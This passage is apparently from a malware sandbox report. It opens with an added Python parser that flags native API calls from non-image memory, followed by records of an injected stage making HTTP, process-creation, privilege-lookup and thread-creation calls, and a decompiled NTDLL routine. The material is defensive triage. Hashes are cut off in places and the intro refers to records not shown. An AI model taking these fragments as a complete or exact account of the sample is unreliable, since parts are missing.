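The four records above (NtCreateFile, NtReadFile and NtClose issued from process 7's dump at 00EA0000, a region the report marks "based on PE: false") are what direct native-API calls from injected, non-image-backed memory look like in this report layout. The Python parser below is an added triage example, not part of the sandbox report or of the sample: it reads records in the layout used on this page and returns the functions whose native API calls originate from memory that is not backed by a PE image, which is the set worth pulling into a detection write-up. The embedded sample is constructed in that layout with placeholder Opcode/Instruction IDs; treating the first dotted field of the dump file name as the report's process number is an assumption.

```python
"""Pull native API calls made from non-PE-backed memory out of per-function records.

Added example (not the report's or the sample's code). Record layout assumed:
an optional "APIs" block of "• Name.MODULE(args), ref: ADDR" lines, a
"• Source File: ..., Offset: ..., based on PE: true|false" line, an optional
"Yara matches" label, "• API ID:" / "• Opcode ID:" lines, and a closing
"Uniqueness Score:" line.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in the page's layout; IDs are placeholders, the API line and
# dump names mirror the records above.
SAMPLE = """
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,00EB3BA7,?,?), ref: 00EB821D
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000001
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
Similarity
• API ID: InitializeThunk
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000002
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000003
Uniqueness Score: -1.00%
"""

API_CALL = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\(.*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SOURCE = re.compile(r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)")
OPCODE = re.compile(r"^•\s*Opcode ID:\s*(?P<id>[0-9a-f]{64})")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int  # call-site address from the "ref:" field


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    source_file: str = ""
    offset: int = 0
    pe_backed: Optional[bool] = None   # None until a Source File line is seen
    yara_match: bool = False
    api_id: str = ""
    calls: List[ApiCall] = field(default_factory=list)

    @property
    def process_number(self) -> int:
        # Assumption: the first dotted field of the dump name is the report's process number.
        return int(self.source_file.split(".")[0], 16)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the text into records; each record closes on its 'Uniqueness Score' line."""
    records: List[FunctionRecord] = []
    current = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Uniqueness Score"):
            records.append(current)
            current = FunctionRecord()
        elif line == "Yara matches":
            current.yara_match = True
        elif (m := API_CALL.match(line)):
            current.calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16)))
        elif (m := SOURCE.match(line)):
            current.source_file = m["file"]
            current.offset = int(m["offset"], 16)
            current.pe_backed = m["pe"] == "true"
        elif (m := OPCODE.match(line)):
            current.opcode_id = m["id"]
        elif line.startswith("• API ID:"):
            current.api_id = line.split(":", 1)[1].strip()
    return records


def calls_from_unbacked_memory(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Functions that issue native API calls from a dump not based on a PE image."""
    return [r for r in records if r.calls and r.pe_backed is False]


if __name__ == "__main__":
    for rec in calls_from_unbacked_memory(parse_records(SAMPLE)):
        names = ", ".join(f"{c.module}!{c.name}@{c.ref:08X}" for c in rec.calls)
        print(f"process {rec.process_number} offset {rec.offset:08X} yara={rec.yara_match}: {names}")
```

Run it against the report's own "Executed Functions" text and the flagged records give you, per analysis process, the call-site addresses and NTDLL exports to cite when describing the injected stage; records from PE-backed dumps (the 03590000 thunks, the 00400000 image) fall out of the list.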

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d308abbccc8082690383181202e199ad8599393d5f06e49ecf2218ab17c32a4d
                                                                    • Instruction ID: f5b0738974077e5bdaf4c4133d27fd429737c629ccabac1e1f8bf963c7ac1a51
                                                                    • Opcode Fuzzy Hash: d308abbccc8082690383181202e199ad8599393d5f06e49ecf2218ab17c32a4d
                                                                    • Instruction Fuzzy Hash: 4C90027120104802D104A9D9540A647000997E1341F51D111A5014559ED7E588917171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 54d79841d62e1b959c1079ca7d21f1980ab95dd106cb9d76ad706751115cee11
                                                                    • Instruction ID: a42b2735cb45d8b57a17b8b94435c40de4812eba5082c41cb31ea39cf588abf7
                                                                    • Opcode Fuzzy Hash: 54d79841d62e1b959c1079ca7d21f1980ab95dd106cb9d76ad706751115cee11
                                                                    • Instruction Fuzzy Hash: EE90027131118802D114A5998406707000997D2241F51C511A081455CD97D588917162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e95b157e8aeeeee202f7a17b52488fde01a80e5b58585181e510959a346fd982
                                                                    • Instruction ID: 99c44fa3b258e00a3904f6fa37713fd13edcb66b4079674562ad46da25eaf0e6
                                                                    • Opcode Fuzzy Hash: e95b157e8aeeeee202f7a17b52488fde01a80e5b58585181e510959a346fd982
                                                                    • Instruction Fuzzy Hash: 7590026921304402D184B599540A60B000997D2242F91D515A000555CCDA9588696361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4b6349b543ef93046f0ae276e81663ed46ba325e97f9662a276f74df5cd26f28
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
• Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
• Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                    • Opcode ID: 5682033dc7b26de448b62d2957b11c37a6b799f44734c8dea898227d38a4e6b1
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
• Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
• Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                    • Opcode ID: 0e7f0c0f7e665219d0f1ea849bd3ce4d4d0a1762f56469f99ff9a6f2f88790b4
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
• Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
• Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                    • Opcode ID: 9f3a7180835927b52614f110651406f2a15ffb6d0f7a14358c76e5d244dd70a8
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
• Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
• Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                    • Opcode ID: af31912b3b0d9b121493298ebdb31b407f26b266273eff3f903ef0c41350e62d
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
• Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
• Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                    • Opcode ID: 589a5204df750aec20614088bc840e4a2e549613cdc3b5b3a68c88e1836ed9e4
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
• Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
• Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                    • Opcode ID: af52529fee85bc86d8b74b5d211ff469a7eaa58a171f291510b65461ed98dd9d
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
• Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
• Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                    • Opcode ID: cbbeb54308fc3539cf415ea9728a37a76cbf3c70827e30dbe58ef511cd14ce51
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
• Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
• Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                    • Opcode ID: 1d235d4b44273a64b881f3c0d6d652d398915d4518e48260d6e4a0f6bec716ba
Uniqueness
Uniqueness Score: -1.00%

APIs
• HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00EB89BC
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: HttpRequestSend
• String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
• API String ID: 360639707-2503632690
                                                                    • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
Uniqueness
Uniqueness Score: -1.00%

APIs
• HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00EB89BC
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: HttpRequestSend
• String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
• API String ID: 360639707-2503632690
                                                                    • Opcode ID: 52ec391f935f9c8049ac92e2fdc19b40a65e0e5907f68e2ea4f78e7a0c382f7a
Uniqueness
Uniqueness Score: -1.00%

APIs
• InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00EB88C8
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: ConnectInternet
• String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
• API String ID: 3050416762-1024195942
                                                                    • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
Uniqueness
Uniqueness Score: -1.00%

APIs
• InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00EB88C8
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: ConnectInternet
• String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
• API String ID: 3050416762-1024195942
                                                                    • Opcode ID: 1beb60638bdf1ca002ce1c8661f89acbec1017934f71d690f4d2ae87c7772c7b
Uniqueness
Uniqueness Score: -1.00%

APIs
• InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00EB8847
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: InternetOpen
• String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
• API String ID: 2038078732-3155091674
                                                                    • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
Uniqueness
Uniqueness Score: -1.00%

APIs
• InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00EB8847
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: InternetOpen
• String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
• API String ID: 2038078732-3155091674
                                                                    • Opcode ID: b4c08f814941fb355689835392012b3b826060c1c1b5934cdd6bdc96885dda63
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(000007D0), ref: 00EB6F98
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
                                                                    • Opcode ID: ca684bb6b441481cdeb2505573588d7da1f275b13871b238975509ddfd0ead1e
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(000007D0), ref: 00EB6F98
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 93471717a2f820b97beefaab349c8c1bda4cc2189cddc55b2d344e3622efbe1f
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00EA3B93), ref: 00EB850D
Strings
Memory Dump Source
• Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Uniqueness
Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00EA3B93), ref: 00EB850D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
                                                                    • Instruction ID: bb24e26b6379bf5d8ef48b60dfa773e0e6d01384c8cb7751f49d98cf7c37dd07
                                                                    • Opcode Fuzzy Hash: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
                                                                    • Instruction Fuzzy Hash: 8FE068AC2042840BDB00EE28E4A08E737C9FF84314710990AEC8983303C134C8068BB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00EA72CA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00EA72EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                    • Instruction ID: 422cfdd14282c10e098f992c7756a2026667d6247c380a5c523c249d7c265cb8
                                                                    • Opcode Fuzzy Hash: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                    • Instruction Fuzzy Hash: 8C018F71A8022877EB20A6949C03FFF77AC5B45B51F150519FF04BA1C2E6A47A0686F6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00EA9BA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: 05b55de570e43bafc7930ea4c8a25c5269de4529c42b30d41ba49ec367cc2c3f
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: DD0112B5D0010DBBDF10DAE4DC42FDEB7B89B54308F0441A5E919AB142F671EB14C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00EACFB2,00EACFB2,?,00000000,?,?), ref: 00EB8670
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
                                                                    • Instruction ID: cf67efed6ef640091a23ba453916de9b9356b56577fb8613908b96d7c326411f
                                                                    • Opcode Fuzzy Hash: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
                                                                    • Instruction Fuzzy Hash: 5F01A2B22042446FDB24DF64CC89EEB7BACEF84310F144599F98D67342C930E811C7A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EB85A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
                                                                    • Instruction ID: d98918d8a576ffce2a0ef1dfae7ffbaf879e6db77e70eb55a6b3d5feb3f5ac82
                                                                    • Opcode Fuzzy Hash: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
                                                                    • Instruction Fuzzy Hash: FA019DB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EB85A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction ID: 5e132e9c6e078113819e2eb39f3737a7f7adf7fffe25ab7101354e31008b8ff9
                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction Fuzzy Hash: F101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00EACCE0,?,?), ref: 00EB705C
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                    • Instruction ID: c1a68b71c6d75317969e0fce7158d03f197d2fbb5116b67ba3b9c7b31c3dfe9b
                                                                    • Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                    • Instruction Fuzzy Hash: 25E06D333853143AE23065ADAC03FE7B29C8B81B20F140026FA4DEA2C1D595F80142A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00EACFB2,00EACFB2,?,00000000,?,?), ref: 00EB8670
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction ID: 957d6af8ebfc2473a7ba2908c5a5a10fe71a66f5eb2c49a948e131870bb989b3
                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction Fuzzy Hash: FFE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0867241CA30E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00EACFB2,00EACFB2,?,00000000,?,?), ref: 00EB8670
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
                                                                    • Instruction ID: 3cfe9383855fbfdb2589bafca2382536f3b5f8742b9633a5072d6ce1ff623049
                                                                    • Opcode Fuzzy Hash: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
                                                                    • Instruction Fuzzy Hash: 35E04FB12002086FDB10DF54CC84EE737ADEF88350F018555F90CA7241CA31E811CBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00EA7C73,?), ref: 00EAD44B
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction ID: 886b2b5b9e77f8a62fc909727bc1fc1f8c102d4d1d8dbb841eee89f1a6435818
                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction Fuzzy Hash: AAD0A7717503043BE610FAA49C03F6772CD5B49F04F494074F949EB3C3D964F5004161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4e105fa4593f11ad463731e94539a13c16fc14ed9790931ecfce4495be5bc343
                                                                    • Instruction ID: 922df3846bf11194e394d9254d4fbbf0bbb2ccab419bbc4255eb6e11f0621392
                                                                    • Opcode Fuzzy Hash: 4e105fa4593f11ad463731e94539a13c16fc14ed9790931ecfce4495be5bc343
                                                                    • Instruction Fuzzy Hash: 8BB09B719014C5C9D615D7A156097177A047BD1741F16C151D2020645A4778C091F5F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 53%
                                                                    			E0364FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                    				void* _t7;
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr* _t12;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t13 = __edx;
                                                                    				_push(_a4);
                                                                    				_t14 =  *[fs:0x18];
                                                                    				_t15 = _t12;
                                                                    				_t7 = E035FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                    				_push(_t13);
                                                                    				E03645720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                    				_t9 =  *_t15;
                                                                    				if(_t9 == 0xffffffff) {
                                                                    					_t10 = 0;
                                                                    				} else {
                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                    				}
                                                                    				_push(_t10);
                                                                    				_push(_t15);
                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                    				return E03645720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                    			}


                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0364FDFA
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0364FE2B
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0364FE01
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
